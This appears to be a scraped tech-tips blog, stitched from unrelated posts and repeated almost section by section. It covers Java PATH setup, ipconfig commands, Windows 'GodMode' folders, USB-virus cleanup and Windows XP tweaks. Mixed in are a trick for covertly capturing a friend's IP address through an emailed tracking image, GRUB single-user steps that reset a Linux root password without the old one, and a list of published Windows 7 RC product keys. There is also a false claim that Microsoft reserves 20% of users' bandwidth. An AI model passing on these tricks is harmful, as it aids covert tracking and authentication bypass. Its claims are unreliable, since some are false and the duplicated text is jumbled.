ghell...sorry to be a pain...but you actually need to use the CLASSPATH variable...and it should at the least contain the following value ".;"
classpath
Yeah, a dot and a semi-colon....why you might ask?...here is a simple answer.
The dot instructs the javac command to look for class definitions in the same directory of your file...before looking else where (JAVA_HOME). This means that if you have packages in your project...javac won't have problems compiling your files because it will start looking there first...and obviously...speed up the whole process of compilations.
Therefore...I would recommend the following setup
JAVA_HOME=C:\Program Files\Java\jdk1.6.0_01;
PATH=%JAVA_HOME%\bin;%PATH%;
CLASS_PATH=.;
Wednesday, August 31, 2011
PATH and CLASSPATH
This section explains how to use the PATH and CLASSPATH environment variables on Microsoft Windows, Solaris, and Linux. Consult the installation instructions included with your installation of the Java Development Kit (JDK) software bundle for current information.
After installing the software, the JDK directory will have the structure shown below.
The bin directory contains both the compiler and the launcher.
Update the PATH Variable (Microsoft Windows NT/2000/XP)
You can run Java applications just fine without setting the PATH variable. Or, you can optionally set it as a convenience.
Set the PATH variable if you want to be able to conveniently run the executables (javac.exe, java.exe, javadoc.exe, and so on) from any directory without having to type the full path of the command. If you do not set the PATH variable, you need to specify the full path to the executable every time you run it, such as:
C:\Program Files\Java\jdk1.6.0\bin\javac MyClass.java
Note: It is useful to set the PATH permanently so it will persist after rebooting. To set it permanently, add the full path of the jdk1.6.0 bin directory to the PATH variable. Set the PATH as follows.
To make a permanent change to the CLASSPATH variable, use the System icon in the Control Panel. The precise procedure varies depending on the version of Windows.
The PATH can be a series of directories separated by semicolons (;). Microsoft Windows looks for programs in the PATH directories in order, from left to right. You should have only one bin directory for the JDK in the path at a time (those following the first are ignored), so if one is already present, you can update that particular entry.
Update the PATH Variable (Solaris and Linux)
You can run the JDK just fine without setting the PATH variable, or you can optionally set it as a convenience. However, you should set the path variable if you want to be able to run the executables (javac, java, javadoc, and so on) from any directory without having to type the full path of the command. If you do not set the PATH variable, you need to specify the full path to the executable every time you run it, such as:
% /usr/local/jdk1.6.0/bin/javac MyClass.java
To find out if the path is properly set, execute:
% java -version
This will print the version of the java tool, if it can find it. If the version is old or you get the error java: Command not found, then the path is not properly set.
To set the path permanently, set the path in your startup file.
For C shell (csh), edit the startup file (~/.cshrc):
set path=(/usr/local/jdk1.6.0/bin )
For bash, edit the startup file (~/.bashrc):
PATH=/usr/local/jdk1.6.0/bin:
export PATH
For ksh, the startup file is named by the environment variable, ENV. To set the path:
PATH=/usr/local/jdk1.6.0/bin:
export PATH
For sh, edit the profile file (~/.profile):
PATH=/usr/local/jdk1.6.0/bin:
export PATH
Then load the startup file and verify that the path is set by repeating the java command:
For C shell (csh):
% source ~/.cshrc
% java -version
For ksh, bash, or sh:
% . /.profile
% java -version
Checking the CLASSPATH variable (All platforms)
The CLASSPATH variable is one way to tell applications, including the JDK tools, where to look for user classes. (Classes that are part of the JRE, JDK platform, and extensions should be defined through other means, such as the bootstrap class path or the extensions directory.)
The preferred way to specify the class path is by using the -cp command line switch. This allows the CLASSPATH to be set individually for each application without affecting other applications. Setting the CLASSPATH can be tricky and should be performed with care.
The default value of the class path is ".", meaning that only the current directory is searched. Specifying either the CLASSPATH variable or the -cp command line switch overrides this value.
To check whether CLASSPATH is set on Microsoft Windows NT/2000/XP, execute the following:
C:> echo %CLASSPATH%
On Solaris or Linux, execute the following:
% echo $CLASSPATH
If CLASSPATH is not set you will get a CLASSPATH: Undefined variable error (Solaris or Linux) or simply %CLASSPATH% (Microsoft Windows NT/2000/XP).
To modify the CLASSPATH, use the same procedure you used for the PATH variable.
Class path wildcards allow you to include an entire directory of .jar files in the class path without explicitly naming them individually. For more information, including an explanation of class path wildcards, and a detailed description on how to clean up the CLASSPATH environment variable, see the Setting the Class Path technical note.
This section explains how to use the PATH and CLASSPATH environment variables on Microsoft Windows, Solaris, and Linux. Consult the installation instructions included with your installation of the Java Development Kit (JDK) software bundle for current information.
After installing the software, the JDK directory will have the structure shown below.
The bin directory contains both the compiler and the launcher.
Update the PATH Variable (Microsoft Windows NT/2000/XP)
You can run Java applications just fine without setting the PATH variable. Or, you can optionally set it as a convenience.
Set the PATH variable if you want to be able to conveniently run the executables (javac.exe, java.exe, javadoc.exe, and so on) from any directory without having to type the full path of the command. If you do not set the PATH variable, you need to specify the full path to the executable every time you run it, such as:
C:\Program Files\Java\jdk1.6.0\bin\javac MyClass.java
Note: It is useful to set the PATH permanently so it will persist after rebooting. To set it permanently, add the full path of the jdk1.6.0 bin directory to the PATH variable. Set the PATH as follows.
To make a permanent change to the CLASSPATH variable, use the System icon in the Control Panel. The precise procedure varies depending on the version of Windows.
The PATH can be a series of directories separated by semicolons (;). Microsoft Windows looks for programs in the PATH directories in order, from left to right. You should have only one bin directory for the JDK in the path at a time (those following the first are ignored), so if one is already present, you can update that particular entry.
Update the PATH Variable (Solaris and Linux)
You can run the JDK just fine without setting the PATH variable, or you can optionally set it as a convenience. However, you should set the path variable if you want to be able to run the executables (javac, java, javadoc, and so on) from any directory without having to type the full path of the command. If you do not set the PATH variable, you need to specify the full path to the executable every time you run it, such as:
% /usr/local/jdk1.6.0/bin/javac MyClass.java
To find out if the path is properly set, execute:
% java -version
This will print the version of the java tool, if it can find it. If the version is old or you get the error java: Command not found, then the path is not properly set.
To set the path permanently, set the path in your startup file.
For C shell (csh), edit the startup file (~/.cshrc):
set path=(/usr/local/jdk1.6.0/bin )
For bash, edit the startup file (~/.bashrc):
PATH=/usr/local/jdk1.6.0/bin:
export PATH
For ksh, the startup file is named by the environment variable, ENV. To set the path:
PATH=/usr/local/jdk1.6.0/bin:
export PATH
For sh, edit the profile file (~/.profile):
PATH=/usr/local/jdk1.6.0/bin:
export PATH
Then load the startup file and verify that the path is set by repeating the java command:
For C shell (csh):
% source ~/.cshrc
% java -version
For ksh, bash, or sh:
% . /.profile
% java -version
Checking the CLASSPATH variable (All platforms)
The CLASSPATH variable is one way to tell applications, including the JDK tools, where to look for user classes. (Classes that are part of the JRE, JDK platform, and extensions should be defined through other means, such as the bootstrap class path or the extensions directory.)
The preferred way to specify the class path is by using the -cp command line switch. This allows the CLASSPATH to be set individually for each application without affecting other applications. Setting the CLASSPATH can be tricky and should be performed with care.
The default value of the class path is ".", meaning that only the current directory is searched. Specifying either the CLASSPATH variable or the -cp command line switch overrides this value.
To check whether CLASSPATH is set on Microsoft Windows NT/2000/XP, execute the following:
C:> echo %CLASSPATH%
On Solaris or Linux, execute the following:
% echo $CLASSPATH
If CLASSPATH is not set you will get a CLASSPATH: Undefined variable error (Solaris or Linux) or simply %CLASSPATH% (Microsoft Windows NT/2000/XP).
To modify the CLASSPATH, use the same procedure you used for the PATH variable.
Class path wildcards allow you to include an entire directory of .jar files in the class path without explicitly naming them individually. For more information, including an explanation of class path wildcards, and a detailed description on how to clean up the CLASSPATH environment variable, see the Setting the Class Path technical note.
How to find your friend's IP:
Find you friend IP by just using the following simple trick,
Go>www.spypig.com
>Enter your E-Mail ID
>Copy the image which is provided there
>You have 60sec
>Paste and send it to your friend (whos IP is to be found out)
>When your friend opens it,you wil get his/her IP..
Find you friend IP by just using the following simple trick,
Go>www.spypig.com
>Enter your E-Mail ID
>Copy the image which is provided there
>You have 60sec
>Paste and send it to your friend (whos IP is to be found out)
>When your friend opens it,you wil get his/her IP..
Free Windows 7 Product Keys for Release Candidate (RC) Activation
The Windows 7 product keys given away by Microsoft to Windows 7 Release Candidate (RC) downloaders appear to be from a pool of same 15 sets of product keys, similar to what’s happen during public availability of Windows 7 Beta where everybody gets the same sets of Windows 7 Beta product keys, after massive interest crashed the Microsoft servers.
After downloading and installing the 32-bit and 64-bit Windows 7 RC x86 and x64 DVD ISO images, the default activation grace period of 30 days applies. For users who want to use the Windows 7 RC systems beyond 30 days activation period, use one of the following free product keys to activate the Windows 7 system.
Download Windows 7 RC ISO and Product Key
Free Windows 7 RC Activation Product Keys
MM7DF-G8XWM-J2VRG-4M3C4-GR27X
KGMPT-GQ6XF-DM3VM-HW6PR-DX9G8
MVBCQ-B3VPW-CT369-VM9TB-YFGBP
KBHBX-GP9P3-KH4H4-HKJP4-9VYKQ
BCGX7-P3XWP-PPPCV-Q2H7C-FCGFR
RGQ3V-MCMTC-6HP8R-98CDK-VP3FM
Q3VMJ-TMJ3M-99RF9-CVPJ3-Q7VF3
6JQ32-Y9CGY-3Y986-HDQKT-BPFPG
P72QK-2Y3B8-YDHDV-29DQB-QKWWM
6F4BB-YCB3T-WK763-3P6YJ-BVH24
9JBBV-7Q7P7-CTDB7-KYBKG-X8HHC
C43GM-DWWV8-V6MGY-G834Y-Y8QH3
GPRG6-H3WBB-WJK6G-XX2C7-QGWQ9
MT39G-9HYXX-J3V3Q-RPXJB-RQ6D7
MVYTY-QP8R7-6G6WG-87MGT-CRH2P
The product keys can be used to activate both 32bit and 64bit Windows 7 RC.
The Windows 7 product keys given away by Microsoft to Windows 7 Release Candidate (RC) downloaders appear to be from a pool of same 15 sets of product keys, similar to what’s happen during public availability of Windows 7 Beta where everybody gets the same sets of Windows 7 Beta product keys, after massive interest crashed the Microsoft servers.
After downloading and installing the 32-bit and 64-bit Windows 7 RC x86 and x64 DVD ISO images, the default activation grace period of 30 days applies. For users who want to use the Windows 7 RC systems beyond 30 days activation period, use one of the following free product keys to activate the Windows 7 system.
Download Windows 7 RC ISO and Product Key
Free Windows 7 RC Activation Product Keys
MM7DF-G8XWM-J2VRG-4M3C4-GR27X
KGMPT-GQ6XF-DM3VM-HW6PR-DX9G8
MVBCQ-B3VPW-CT369-VM9TB-YFGBP
KBHBX-GP9P3-KH4H4-HKJP4-9VYKQ
BCGX7-P3XWP-PPPCV-Q2H7C-FCGFR
RGQ3V-MCMTC-6HP8R-98CDK-VP3FM
Q3VMJ-TMJ3M-99RF9-CVPJ3-Q7VF3
6JQ32-Y9CGY-3Y986-HDQKT-BPFPG
P72QK-2Y3B8-YDHDV-29DQB-QKWWM
6F4BB-YCB3T-WK763-3P6YJ-BVH24
9JBBV-7Q7P7-CTDB7-KYBKG-X8HHC
C43GM-DWWV8-V6MGY-G834Y-Y8QH3
GPRG6-H3WBB-WJK6G-XX2C7-QGWQ9
MT39G-9HYXX-J3V3Q-RPXJB-RQ6D7
MVYTY-QP8R7-6G6WG-87MGT-CRH2P
The product keys can be used to activate both 32bit and 64bit Windows 7 RC.
chat
If you chat very frequently with one of your friend then now you can make gtalk chat shortcut on your desktop. It willl initiate a chat with only one click. On click it opens a chat window where you can chat with your friend. But unfortunately this trick works only in window xp nt in window vista.
Here are steps to follow:
1) Right click on your desktop and go to New > Shortcut.
2) In create shortcut window, type gtalk:chat?jid= username@ gmail.com. Where username is gmail id of your friend.
3) Click ok.
Its done.
You can also make shortcut to call your friend for that you have to write gtalk:call?jid= username@ gmail.com
If you chat very frequently with one of your friend then now you can make gtalk chat shortcut on your desktop. It willl initiate a chat with only one click. On click it opens a chat window where you can chat with your friend. But unfortunately this trick works only in window xp nt in window vista.
Here are steps to follow:
1) Right click on your desktop and go to New > Shortcut.
2) In create shortcut window, type gtalk:chat?jid= username@ gmail.com. Where username is gmail id of your friend.
3) Click ok.
Its done.
You can also make shortcut to call your friend for that you have to write gtalk:call?jid= username@ gmail.com
IP commands
Display Connection Configuration: ipconfig /all or ipconfig/?
Display DNS Cache Info Configuration: ipconfig /displaydns
Clear DNS Cache: ipconfig /flushdns
Release All IP Address Connections: ipconfig /release
Renew All IP Address Connections: ipconfig /renew
Re-Register the DNS connections: ipconfig /registerdns
Display DHCP Class Information:ipconfig /showclassid
Change/Modify DHCP Class ID: ipconfig /setclassid
Network Connections: control netconnections
Network Setup Wizard: netsetup.cpl
Test Connectivity: ping
Trace IP address Route: tracert
Displays the TCP/IP protocol sessions: netstat
Display Local Route: route
Display Resolved MAC Addresses: arp
Display Name of Computer Currently on: hostname
Display Connection Configuration: ipconfig /all or ipconfig/?
Display DNS Cache Info Configuration: ipconfig /displaydns
Clear DNS Cache: ipconfig /flushdns
Release All IP Address Connections: ipconfig /release
Renew All IP Address Connections: ipconfig /renew
Re-Register the DNS connections: ipconfig /registerdns
Display DHCP Class Information:ipconfig /showclassid
Change/Modify DHCP Class ID: ipconfig /setclassid
Network Connections: control netconnections
Network Setup Wizard: netsetup.cpl
Test Connectivity: ping
Trace IP address Route: tracert
Displays the TCP/IP protocol sessions: netstat
Display Local Route: route
Display Resolved MAC Addresses: arp
Display Name of Computer Currently on: hostname
Reset the root password in Linux Systems.
1) When it shows the two Os (Windows, Red hat), highlight the red hat option and Press ‘e’.
2) This will show two or three options; in these one of the options will have ‘kernel’ word. Highlight that option and press ‘e’.
3) This will show the grub command line, in that line shown press a space and type ‘1’(no single quotes) to login into the single user mode and press Enter.
4) Linux will start to load and it will show # prompt.
5) Now type ‘passwd’, this will prompt for the new password.
6) Type the new password, once again it will ask for retype, retype once again and press enter.
7) Type exit to quit the prompt and linux will start to load.
8) Now you can login into the root user with your changed password.
1) When it shows the two Os (Windows, Red hat), highlight the red hat option and Press ‘e’.
2) This will show two or three options; in these one of the options will have ‘kernel’ word. Highlight that option and press ‘e’.
3) This will show the grub command line, in that line shown press a space and type ‘1’(no single quotes) to login into the single user mode and press Enter.
4) Linux will start to load and it will show # prompt.
5) Now type ‘passwd’, this will prompt for the new password.
6) Type the new password, once again it will ask for retype, retype once again and press enter.
7) Type exit to quit the prompt and linux will start to load.
8) Now you can login into the root user with your changed password.
Secret ‘GodModes’ in Windows 7
7 January 2010 6 Comments Posted By Ashik
StumbleUpon.com
Share
5 retweet
The foxy-sounding name is a little deceiving, because as far as we know, it is exactly what people are calling it – a glorified control panel. However, that goes without saying how useful this feature actually is.
GodMode is the name given to cheats in video games that provided you with all weapons and access to all areas. As it turns out, Windows 7 has a GodMode cheat as well. It is basically a control panel of sorts which provides you access to all the features in one explorer window. In the Windows 7 control panel, features are grouped together either in categories or control panel item names. Nothing is grouped under anything in GodMode.
How to access GodMode?
Method 1:
1. Create a new folder and name it GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
2. The icon will be changed automatically to Control Panel’s icon.
3. Now open the folder and see the magic of Windows Registry!
Method 2
1. Create a shortcut with following path and set desired icon:
explorer.exe shell:::{ED7BA470-8E54-465E-825C-99712043E01C}
Note: Sometimes it kills explorer.exe using Method 1! probably Windows Vista x64 editions. Therefore I suggest to use Method 2.
Solution for the Crash
To get rid of this issue, Boot into Safe Mode with Command Prompt and delete that folder. For eg. You created a folder GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} on desktop, So either navigate to Desktop folder execute the following command:
RmDir “GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}”
Or type the absolute path of folder, like-
RmDir “C:\Users\\Desktop\GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}”
Applies To:
* Windows Vista x86 editions
* Windows Vista x64 editions
* Windows 7 x86 editions
* Windows 7 x64 editions
Windows has lot of GodModes
It is found that there are lot of GodModes and they differ based on the Strings used in Name the Folder.
In an e-mail interview, Steven Sinofsky, Windows division president, said several similar undocumented features provide direct access to all kinds of settings, from choosing a location to managing power settings to identifying biometric sensors.
As with the all-encompassing GodMode uncovered by bloggers, these other settings can be accessed directly by creating a new folder with any name (GodMode or otherwise) and then including a certain text string. Sinofsky noted more than a dozen strings create particular settings folders, in addition to the overarching GodMode folder option.
For example, the first one could be a folder named “Hungry Hacker.{00C6D95F-329C-409a-81D7-C46C66EA7F33}” (use everything inside quotes–but not the quotes themselves).
Here’s the list of strings:
{00C6D95F-329C-409a-81D7-C46C66EA7F33}
{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}
{025A5937-A6BE-4686-A844-36FE4BEC8B6D}
{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}
{1206F5F1-0569-412C-8FEC-3204630DFB70}
{15eae92e-f17a-4431-9f28-805e482dafd4}
{17cd9488-1228-4b2f-88ce-4298e93e0966}
{1D2680C9-0E2A-469d-B787-065558BC7D43}
{1FA9085F-25A2-489B-85D4-86326EEDCD87}
{208D2C60-3AEA-1069-A2D7-08002B30309D}
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
{2227A280-3AEA-1069-A2DE-08002B30309D}
{241D7C96-F8BF-4F85-B01F-E2B043341A4B}
{4026492F-2F69-46B8-B9BF-5654FC07E423}
{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}
{78F3955E-3B90-4184-BD14-5397C15F1EFC}
7 January 2010 6 Comments Posted By Ashik
StumbleUpon.com
Share
5 retweet
The foxy-sounding name is a little deceiving, because as far as we know, it is exactly what people are calling it – a glorified control panel. However, that goes without saying how useful this feature actually is.
GodMode is the name given to cheats in video games that provided you with all weapons and access to all areas. As it turns out, Windows 7 has a GodMode cheat as well. It is basically a control panel of sorts which provides you access to all the features in one explorer window. In the Windows 7 control panel, features are grouped together either in categories or control panel item names. Nothing is grouped under anything in GodMode.
How to access GodMode?
Method 1:
1. Create a new folder and name it GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
2. The icon will be changed automatically to Control Panel’s icon.
3. Now open the folder and see the magic of Windows Registry!
Method 2
1. Create a shortcut with following path and set desired icon:
explorer.exe shell:::{ED7BA470-8E54-465E-825C-99712043E01C}
Note: Sometimes it kills explorer.exe using Method 1! probably Windows Vista x64 editions. Therefore I suggest to use Method 2.
Solution for the Crash
To get rid of this issue, Boot into Safe Mode with Command Prompt and delete that folder. For eg. You created a folder GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} on desktop, So either navigate to Desktop folder execute the following command:
RmDir “GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}”
Or type the absolute path of folder, like-
RmDir “C:\Users\
Applies To:
* Windows Vista x86 editions
* Windows Vista x64 editions
* Windows 7 x86 editions
* Windows 7 x64 editions
Windows has lot of GodModes
It is found that there are lot of GodModes and they differ based on the Strings used in Name the Folder.
In an e-mail interview, Steven Sinofsky, Windows division president, said several similar undocumented features provide direct access to all kinds of settings, from choosing a location to managing power settings to identifying biometric sensors.
As with the all-encompassing GodMode uncovered by bloggers, these other settings can be accessed directly by creating a new folder with any name (GodMode or otherwise) and then including a certain text string. Sinofsky noted more than a dozen strings create particular settings folders, in addition to the overarching GodMode folder option.
For example, the first one could be a folder named “Hungry Hacker.{00C6D95F-329C-409a-81D7-C46C66EA7F33}” (use everything inside quotes–but not the quotes themselves).
Here’s the list of strings:
{00C6D95F-329C-409a-81D7-C46C66EA7F33}
{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}
{025A5937-A6BE-4686-A844-36FE4BEC8B6D}
{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}
{1206F5F1-0569-412C-8FEC-3204630DFB70}
{15eae92e-f17a-4431-9f28-805e482dafd4}
{17cd9488-1228-4b2f-88ce-4298e93e0966}
{1D2680C9-0E2A-469d-B787-065558BC7D43}
{1FA9085F-25A2-489B-85D4-86326EEDCD87}
{208D2C60-3AEA-1069-A2D7-08002B30309D}
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
{2227A280-3AEA-1069-A2DE-08002B30309D}
{241D7C96-F8BF-4F85-B01F-E2B043341A4B}
{4026492F-2F69-46B8-B9BF-5654FC07E423}
{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}
{78F3955E-3B90-4184-BD14-5397C15F1EFC}
How to prevent your PEN drive from VIRUS
Friends many of your PC/laptop's normally gets virus because of Pen Drives or USB devices (Even PC's who are not connected to network ). Some Virus like Ravmon Virus , Heap41a worm which are not detected by anti virus normally spreads mostly by the Pen Drives . In such a case what can you do to prevent your PC from getting infected with Virus that spreads through USB devices or Pen Drives ?
You can protect your PC by just following the simple steps below . It won't take much time.
Connect your Pen Drive or USB drive to your computer .
Now a dialogue window will popup asking you to choose among the options as shown in the figure.
Don't choose any of them , Just simply click Cancel.
*Now go to Start--> Run and type cmd to open the Command Prompt window .
*Now go to My Computer and Check the Drive letter of your USB drive or Pen Drive.
( E.g. If it is written Kingston (I), then I: will be the drive letter .)
*In the Command Window ( cmd ) , type the drive letter: and Hit Enter .
*Now type dir/w/o/a/p and Hit Enter
*You will get a list of files . In the list , search if anyone of the following do exist
1. Autorun.inf
2. New Folder.exe
3. Bha.vbs
4. Iexplore.vbs
5. Info.exe
6. New_Folder.exe
7. Ravmon.exe
8. RVHost.exe or any other files with .exe Extension .
If you find any one of the files above , Run the command attrib -h -r -s -a *.* and Hit Enter.
Now Delete each File using the following Command del filename ( E.g del autorun.inf ) .
That's it .Now just scan your USB drive with the anti virus you have to ensure that you made your Pen
Drive free of Virus .
Hi Frnds...
This virus is very very common now...
To know whether ur system is infected just type C:\heap41a in the address bar...
if there is a folder named heap41a, then ur system is infected...
(AVAST antivirus is the best solution for this worm...) symantec also works
Friends many of your PC/laptop's normally gets virus because of Pen Drives or USB devices (Even PC's who are not connected to network ). Some Virus like Ravmon Virus , Heap41a worm which are not detected by anti virus normally spreads mostly by the Pen Drives . In such a case what can you do to prevent your PC from getting infected with Virus that spreads through USB devices or Pen Drives ?
You can protect your PC by just following the simple steps below . It won't take much time.
Connect your Pen Drive or USB drive to your computer .
Now a dialogue window will popup asking you to choose among the options as shown in the figure.
Don't choose any of them , Just simply click Cancel.
*Now go to Start--> Run and type cmd to open the Command Prompt window .
*Now go to My Computer and Check the Drive letter of your USB drive or Pen Drive.
( E.g. If it is written Kingston (I), then I: will be the drive letter .)
*In the Command Window ( cmd ) , type the drive letter: and Hit Enter .
*Now type dir/w/o/a/p and Hit Enter
*You will get a list of files . In the list , search if anyone of the following do exist
1. Autorun.inf
2. New Folder.exe
3. Bha.vbs
4. Iexplore.vbs
5. Info.exe
6. New_Folder.exe
7. Ravmon.exe
8. RVHost.exe or any other files with .exe Extension .
If you find any one of the files above , Run the command attrib -h -r -s -a *.* and Hit Enter.
Now Delete each File using the following Command del filename ( E.g del autorun.inf ) .
That's it .Now just scan your USB drive with the anti virus you have to ensure that you made your Pen
Drive free of Virus .
Hi Frnds...
This virus is very very common now...
To know whether ur system is infected just type C:\heap41a in the address bar...
if there is a folder named heap41a, then ur system is infected...
(AVAST antivirus is the best solution for this worm...) symantec also works
Available for users only
Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc
You can get it back:
Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to:
Local Computer Policy >
Computer Configuration >
Administrative Templates >
Network >
QOS Packet Scheduler >
then to Limit Reservable Bandwidth
Double click on Limit Reservable bandwidth. It will say it is not
configured, but the truth is under the 'Explain' tab i.e."By default,
the Packet Scheduler limits the system to 20 percent of the bandwidth
of a connection, but you can use this setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO.
This will allow the system to reserve nothing, rather than the default
20%. It works on Win 2000 as well.
Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc
You can get it back:
Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to:
Local Computer Policy >
Computer Configuration >
Administrative Templates >
Network >
QOS Packet Scheduler >
then to Limit Reservable Bandwidth
Double click on Limit Reservable bandwidth. It will say it is not
configured, but the truth is under the 'Explain' tab i.e."By default,
the Packet Scheduler limits the system to 20 percent of the bandwidth
of a connection, but you can use this setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO.
This will allow the system to reserve nothing, rather than the default
20%. It works on Win 2000 as well.
20 things you didn't know about Windows XP
You've read the reviews and digested the key feature enhancements and operational changes. Now it's time to delve a bit deeper and uncover some of Windows XP's secrets.
1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).
2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).
3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.
4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.
5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.
6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.
7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.
8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.
9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.
10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.
11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.
12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.
13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.
14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.
15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.
16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.
17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.
18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.
19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.
20. The next release of Windows XP, codenamed Longhorn, is due out late next year or early 2003 and won't be much to write home about. The next big release is codenamed Blackcomb and will be out in 2003/2004.
You've read the reviews and digested the key feature enhancements and operational changes. Now it's time to delve a bit deeper and uncover some of Windows XP's secrets.
1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).
2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).
3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.
4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.
